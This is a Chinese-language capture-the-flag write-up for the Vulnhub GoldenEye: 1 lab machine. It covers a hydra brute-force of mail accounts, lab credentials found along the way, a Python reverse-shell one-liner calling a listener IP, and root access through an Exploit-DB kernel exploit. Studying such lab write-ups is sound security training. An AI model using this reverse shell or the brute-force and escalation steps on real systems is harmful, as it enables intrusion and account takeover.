Vulnhub-靶机-GOLDENEYE: 1

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站，需要发现目标靶机的IP地址，可以使用nmap，netdiscover，或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的，那么本次演示就是arp-scan工具发现

地址:​​https://www.vulnhub.com/entry/goldeneye-1,240/​​​
​

有开放80端口，直接访问下web看看

根据上述提示知道一个访问路径/sev-home/ 访问看看

查看页面信息和所在网页的源码发现如下有价值的信息

反馈了目标靶机开放了一个非默认的高端口邮件服务器，因为根据我们上面nmap扫描的结果，nmap给出的结果中有一个高端口标记的是pop协议服务，那我们访问看看

根据页面显示，可知邮件服务访问正常，我们得知道目标邮件的服务器账户和密码，拿起hydra进行暴力破解操作，因为上面已经得知两个用户名boris,natalya ，所以使用这两个用户名使用kali密码进行暴力破解，这里使用rockyou密码字典使用了比较长的时间没有暴力破解成功，最后使用了fasttrack.txt， 进行暴力破解成了，获得了用户名和密码，分别是：

用户：boris/secret1!
用户：natalya/bird

得到上面账户和密码那么我们使用nc或者telnet命令访问看看

最终使用用户名为natalya得到了一份有价值的信息，一个信息的用户名和密码，并且提示一个域名需要绑定hosts访问

username: xenia
password: RCP90rulez!

需要绑定hosts的域名severnaya-station.com

绑定域名之后直接登录发现了一封邮件信息

通过邮件讯息发现用户名doak 使用hydra进行暴力得出如下密码

进入邮箱查看邮件讯息

发现账号和密码

username: dr_doak
password: 4England!

使用这个账户密码登陆目标web，发现如下信息：

 

知道这个路径之后，访问看看

图片表面没看到什么有价值的信息，下载下来看看是否存在隐藏信息

下载完成之后，使用strings命令看看是否有隐藏内容

果然发现了一个经过base64编码的信息，尝试使用brup进行解码看看

上面解码的信息是密码信息，根据目标靶机提供的信息，猜测此密码信息就是管理员，且知道目标靶机admin作为管理员 

xWinter1995x!

登陆之后调整目标靶机的web使用的shell

配置Python的反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.5.130",8856));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

执行shell进行反弹

本地监听反弹shell的端口8856

成功反弹shell，获取tty-shell

在键盘上按住Ctrl+Z
此时便退出了当前的反弹shell
在当前的shell 执行 stty raw -echo
fg

尝试进行提权，在谷歌上对应的版本号的exploit

 

 ​​https://www.exploit-db.com/exploits/37292​​  对应的exp，可以在这里下载，也可以根据编号直接在kali本地直接搜索

测试了下，目标靶机没有gcc环境，那么这里可以使用cc编译环境进行编译生成，首先将exp代码下载到目标靶机上去

 在目标靶机上使用cc进行编译成功之后，直接执行提权成功获取falg

 

 

迷茫的人生，需要不断努力，才能看清远方模糊的志向！